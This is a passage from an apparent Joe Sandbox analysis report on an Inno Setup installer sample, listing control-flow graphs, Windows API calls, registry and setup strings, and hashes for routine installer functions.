call 44684c call 403738 call 4467f0 GetProcAddress 1131->1142 1143 491081-49108e call 403684 1131->1143 1152 490fd7-490fe5 GetLastError call 446acc 1132->1152 1153 490fc7-490fd5 call 446acc 1132->1153 1177 491071-49107c call 446924 1142->1177 1178 491037-49106c call 4467f0 * 2 call 446acc call 446924 1142->1178 1157 491090-4910b1 call 4467f0 FreeLibrary call 446924 1143->1157 1158 4910b6-4910c3 call 403684 1143->1158 1164 490fea-490ff5 call 446acc 1152->1164 1153->1164 1157->1028 1170 4910e8-4910f5 call 403684 1158->1170 1171 4910c5-4910e3 call 44684c call 403738 CreateMutexA 1158->1171 1164->1028 1185 49112b-491138 call 403684 1170->1185 1186 4910f7-491129 call 48ae84 call 403574 call 403738 OemToCharBuffA call 48ae9c 1170->1186 1171->1028 1177->1028 1178->1028 1195 49113a-49116c call 48ae84 call 403574 call 403738 CharToOemBuffA call 48ae9c 1185->1195 1196 49116e 1185->1196 1186->1028 1195->1028 1196->1028
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
                                                                          • FindWindowA.USER32(00000000,00000000), ref: 00490D09
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FindSleepWindow
                                                                          • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                          • API String ID: 3078808852-3310373309
                                                                          • Opcode ID: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                          • Instruction ID: 3689c34fe079b887eecbe3c8abd258a9be24a9666ebde3bfb919725182042c62
                                                                          • Opcode Fuzzy Hash: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                          • Instruction Fuzzy Hash: 8EC19C60B002026BDB14BB3E8C8291E599A9FC9708B11D93FF546EB79ACD3DDD06435E

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1573 481df0-481e15 GetModuleHandleA GetProcAddress 1574 481e7c-481e81 GetSystemInfo 1573->1574 1575 481e17-481e2d GetNativeSystemInfo GetProcAddress 1573->1575 1576 481e86-481e8f 1574->1576 1575->1576 1577 481e2f-481e3a GetCurrentProcess 1575->1577 1578 481e9f-481ea6 1576->1578 1579 481e91-481e95 1576->1579 1577->1576 1586 481e3c-481e40 1577->1586 1582 481ec1-481ec6 1578->1582 1580 481ea8-481eaf 1579->1580 1581 481e97-481e9b 1579->1581 1580->1582 1584 481e9d-481eba 1581->1584 1585 481eb1-481eb8 1581->1585 1584->1582 1585->1582 1586->1576 1588 481e42-481e49 call 451d7c 1586->1588 1588->1576 1591 481e4b-481e58 GetProcAddress 1588->1591 1591->1576 1592 481e5a-481e71 GetModuleHandleA GetProcAddress 1591->1592 1592->1576 1593 481e73-481e7a 1592->1593 1593->1576
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
                                                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
                                                                          • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                          • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                          • API String ID: 2230631259-2623177817
                                                                          • Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                          • Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
                                                                          • Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                          • Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1594 472708-47273b 1595 472e26-472e5a call 46d4ec call 403400 * 2 call 403420 1594->1595 1596 472741-472745 1594->1596 1598 47274c-472789 call 40b44c call 4780d8 1596->1598 1607 47278f-4727ce call 47c6f0 call 477d4c call 47ad88 * 2 1598->1607 1608 472e1a-472e20 1598->1608 1620 4727d4-4727db 1607->1620 1621 4727d0 1607->1621 1608->1595 1608->1598 1622 4727f4-47280d 1620->1622 1623 4727dd-4727e4 1620->1623 1621->1620 1626 472833-47283a 1622->1626 1627 47280f-472819 call 472538 1622->1627 1624 4727e6-4727eb call 4529a4 1623->1624 1625 4727f0 1623->1625 1624->1625 1625->1622 1630 47283c-472843 1626->1630 1631 472849-472850 1626->1631 1627->1626 1636 47281b-47282e call 403738 call 42dde8 1627->1636 1630->1631 1633 472cf7-472d2d 1630->1633 1634 4728a3-4728c3 call 47255c 1631->1634 1635 472852-472859 1631->1635 1633->1622 1643 472d33-472d3a 1633->1643 1646 472936-47293d 1634->1646 1647 4728c5-4728ea call 403738 call 42dd0c 1634->1647 1635->1634 1639 47285b-47287d call 403738 call 42dd44 1635->1639 1636->1626 1639->1633 1667 472883-47289e call 403738 RegDeleteValueA RegCloseKey 1639->1667 1648 472d6d-472d74 1643->1648 1649 472d3c-472d46 call 472538 1643->1649 1654 472986 1646->1654 1655 47293f-472963 call 403738 call 42dd44 1646->1655 1682 4728ef-4728f3 1647->1682 1652 472da7-472dae 1648->1652 1653 472d76-472d80 call 472538 1648->1653 1649->1648 1666 472d48-472d68 call 459ad4 1649->1666 1663 472db0-472dd6 call 459ad4 1652->1663 1664 472ddb-472de2 1652->1664 1653->1652 1680 472d82-472da2 call 459ad4 1653->1680 1660 47298b-47298d 1654->1660 1655->1660 1697 472965-472968 1655->1697 1660->1633 1668 472993-4729a8 1660->1668 1663->1664 1673 472de4-472e0a call 459ad4 1664->1673 1674 472e0f-472e15 call 477d78 1664->1674 1666->1648 1667->1633 1678 4729bc-4729c3 1668->1678 1679 4729aa-4729b7 call 403738 RegDeleteValueA 1668->1679 1673->1674 1674->1608 1686 472cd9-472cef RegCloseKey 1678->1686 1687 4729c9-4729d0 1678->1687 1679->1678 1680->1652 1690 4728f5-4728f9 1682->1690 1691 47291a-472921 1682->1691 1695 4729d2-4729e6 call 403738 call 42dc8c 1687->1695 1696 4729ec-4729f9 1687->1696 1690->1660 1692 4728ff-472918 call 47255c 1690->1692 1691->1660 1693 472923-472934 call 46dd50 1691->1693 1692->1660 1693->1660 1695->1686 1695->1696 1696->1686 1698 4729ff 1696->1698 1697->1660 1702 47296a-472971 1697->1702 1698->1686 1703 472c26-472c41 call 47ad88 call 430acc 1698->1703 1704 472bc4-472bfd call 47ad88 call 406da0 call 403738 RegSetValueExA 1698->1704 1705 472a22-472a2c 1698->1705 1706 472c8b-472cbd call 403574 call 403738 * 2 RegSetValueExA 1698->1706 1702->1660 1710 472973-472984 call 46dd50 1702->1710 1737 472c43-472c48 call 4529a4 1703->1737 1738 472c4d-472c6d call 403738 RegSetValueExA 1703->1738 1704->1686 1756 472c03-472c0a 1704->1756 1712 472a35-472a3a 1705->1712 1713 472a2e-472a31 1705->1713 1706->1686 1752 472cbf-472cc6 1706->1752 1710->1660 1722 472a41-472a43 1712->1722 1719 472a33 1713->1719 1720 472a3c 1713->1720 1719->1722 1720->1722 1728 472ae0-472af2 call 40385c 1722->1728 1729 472a49-472a5b call 40385c 1722->1729 1747 472af4-472b0b call 403738 call 42dc80 1728->1747 1748 472b0d-472b10 call 403400 1728->1748 1744 472a76-472a79 call 403400 1729->1744 1745 472a5d-472a74 call 403738 call 42dc74 1729->1745 1737->1738 1738->1686 1763 472c6f-472c76 1738->1763 1759 472a7e-472a85 1744->1759 1745->1744 1745->1759 1747->1748 1760 472b15-472b4e call 47ada8 1747->1760 1748->1760 1752->1686 1761 472cc8-472cd4 call 46dd50 1752->1761 1756->1686 1758 472c10-472c21 call 46dd50 1756->1758 1758->1686 1766 472a87-472aa5 call 403738 RegQueryValueExA 1759->1766 1767 472ab6-472adb call 47ada8 1759->1767 1781 472b50-472b60 call 403574 1760->1781 1782 472b6f-472b9b call 403574 call 403738 * 2 RegSetValueExA 1760->1782 1761->1686 1763->1686 1771 472c78-472c89 call 46dd50 1763->1771 1766->1767 1784 472aa7-472aab 1766->1784 1767->1782 1771->1686 1781->1782 1792 472b62-472b6a call 40357c 1781->1792 1782->1686 1797 472ba1-472ba8 1782->1797 1787 472ab3 1784->1787 1788 472aad-472ab1 1784->1788 1787->1767 1788->1767 1788->1787 1792->1782 1797->1686 1798 472bae-472bbf call 46dd50 1797->1798 1798->1686
                                                                          APIs
                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899
                                                                            • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7
                                                                            • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                            • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteErrorLastValue$CloseCreate
                                                                          • String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
                                                                          • API String ID: 2638610037-3092547568
                                                                          • Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                          • Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
                                                                          • Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                          • Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1801 4684c8-468500 call 47ad88 1804 468506-468516 call 4778cc 1801->1804 1805 4686e2-4686fc call 403420 1801->1805 1810 46851b-468560 call 4078fc call 403738 call 42dd44 1804->1810 1816 468565-468567 1810->1816 1817 46856d-468582 1816->1817 1818 4686d8-4686dc 1816->1818 1819 468597-46859e 1817->1819 1820 468584-468592 call 42dc74 1817->1820 1818->1805 1818->1810 1822 4685a0-4685c2 call 42dc74 call 42dc8c 1819->1822 1823 4685cb-4685d2 1819->1823 1820->1819 1822->1823 1844 4685c4 1822->1844 1824 4685d4-4685f9 call 42dc74 * 2 1823->1824 1825 46862b-468632 1823->1825 1847 4685fb-468604 call 478558 1824->1847 1848 468609-46861b call 42dc74 1824->1848 1829 468634-468646 call 42dc74 1825->1829 1830 468678-46867f 1825->1830 1840 468656-468668 call 42dc74 1829->1840 1841 468648-468651 call 478558 1829->1841 1832 468681-4686b5 call 42dc74 * 3 1830->1832 1833 4686ba-4686d0 RegCloseKey 1830->1833 1832->1833 1840->1830 1854 46866a-468673 call 478558 1840->1854 1841->1840 1844->1823 1847->1848 1848->1825 1858 46861d-468626 call 478558 1848->1858 1854->1830 1858->1825
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB
                                                                          Strings
                                                                          • Inno Setup: Selected Tasks, xrefs: 00468637
                                                                          • Inno Setup: Deselected Tasks, xrefs: 00468659
                                                                          • %s\%s_is1, xrefs: 00468545
                                                                          • Inno Setup: Selected Components, xrefs: 004685EA
                                                                          • Inno Setup: User Info: Serial, xrefs: 004686AD
                                                                          • Inno Setup: Setup Type, xrefs: 004685DA
                                                                          • Inno Setup: User Info: Name, xrefs: 00468687
                                                                          • Inno Setup: User Info: Organization, xrefs: 0046869A
                                                                          • Inno Setup: Icon Group, xrefs: 004685A6
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
                                                                          • Inno Setup: Deselected Components, xrefs: 0046860C
                                                                          • Inno Setup: App Path, xrefs: 0046858A
                                                                          • Inno Setup: No Icons, xrefs: 004685B3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1093091907
                                                                          • Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                          • Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
                                                                          • Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                          • Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2019 47b8dc-47b932 call 42c40c call 4035c0 call 47b558 call 451c38 2028 47b934-47b939 call 4529a4 2019->2028 2029 47b93e-47b94d call 451c38 2019->2029 2028->2029 2033 47b967-47b96d 2029->2033 2034 47b94f-47b955 2029->2034 2037 47b984-47b9ac call 42e2bc * 2 2033->2037 2038 47b96f-47b975 2033->2038 2035 47b977-47b97f call 403494 2034->2035 2036 47b957-47b95d 2034->2036 2035->2037 2036->2033 2039 47b95f-47b965 2036->2039 2045 47b9d3-47b9ed GetProcAddress 2037->2045 2046 47b9ae-47b9ce call 4078fc call 4529a4 2037->2046 2038->2035 2038->2037 2039->2033 2039->2035 2047 47b9ef-47b9f4 call 4529a4 2045->2047 2048 47b9f9-47ba16 call 403400 * 2 2045->2048 2046->2045 2047->2048
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(6F940000,SHGetFolderPathA), ref: 0047B9DE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
                                                                          • API String ID: 190572456-2632518235
                                                                          • Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                          • Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
                                                                          • Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                          • Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
                                                                          • API String ID: 1375471231-857235331
                                                                          • Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                          • Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
                                                                          • Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                          • Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2220 406334-40634e GetModuleHandleA GetProcAddress 2221 406350 2220->2221 2222 406357-406364 GetProcAddress 2220->2222 2221->2222 2223 406366 2222->2223 2224 40636d-40637a GetProcAddress 2222->2224 2223->2224 2225 406380-406381 2224->2225 2226 40637c-40637e SetProcessDEPPolicy 2224->2226 2226->2225
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                          • API String ID: 3256987805-3653653586
                                                                          • Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                          • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                          • Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                          • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2227 423884-42388e 2228 4239b7-4239bb 2227->2228 2229 423894-4238b6 call 41f3d4 GetClassInfoA 2227->2229 2232 4238e7-4238f0 GetSystemMetrics 2229->2232 2233 4238b8-4238cf RegisterClassA 2229->2233 2235 4238f2 2232->2235 2236 4238f5-4238ff GetSystemMetrics 2232->2236 2233->2232 2234 4238d1-4238e2 call 408cc4 call 40311c 2233->2234 2234->2232 2235->2236 2238 423901 2236->2238 2239 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2236->2239 2238->2239 2250 423962-423975 call 424188 SendMessageA 2239->2250 2251 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2239->2251 2250->2251 2251->2228 2253 4239aa-4239b2 DeleteMenu 2251->2253 2253->2228
                                                                          APIs
                                                                            • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                          • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                          • RegisterClassA.USER32(00498630), ref: 004238C7
                                                                          • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                          • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                          • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                          • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                          • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                          • String ID:
                                                                          • API String ID: 183575631-0
                                                                          • Opcode ID: 49e735772f48ae54fcb5fe38930a04ff9474ea8db1f89588e4f946a5e3ff9012
                                                                          • Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
                                                                          • Opcode Fuzzy Hash: 49e735772f48ae54fcb5fe38930a04ff9474ea8db1f89588e4f946a5e3ff9012
                                                                          • Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2255 42f3d4-42f3de 2256 42f3e0-42f3e3 call 402d30 2255->2256 2257 42f3e8-42f425 call 402b30 GetActiveWindow GetFocus call 41eeb4 2255->2257 2256->2257 2263 42f437-42f43f 2257->2263 2264 42f427-42f431 RegisterClassA 2257->2264 2265 42f4c6-42f4e2 SetFocus call 403400 2263->2265 2266 42f445-42f476 CreateWindowExA 2263->2266 2264->2263 2266->2265 2267 42f478-42f4bc call 42428c call 403738 CreateWindowExA 2266->2267 2267->2265 2274 42f4be-42f4c1 ShowWindow 2267->2274 2274->2265
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042F403
                                                                          • GetFocus.USER32 ref: 0042F40B
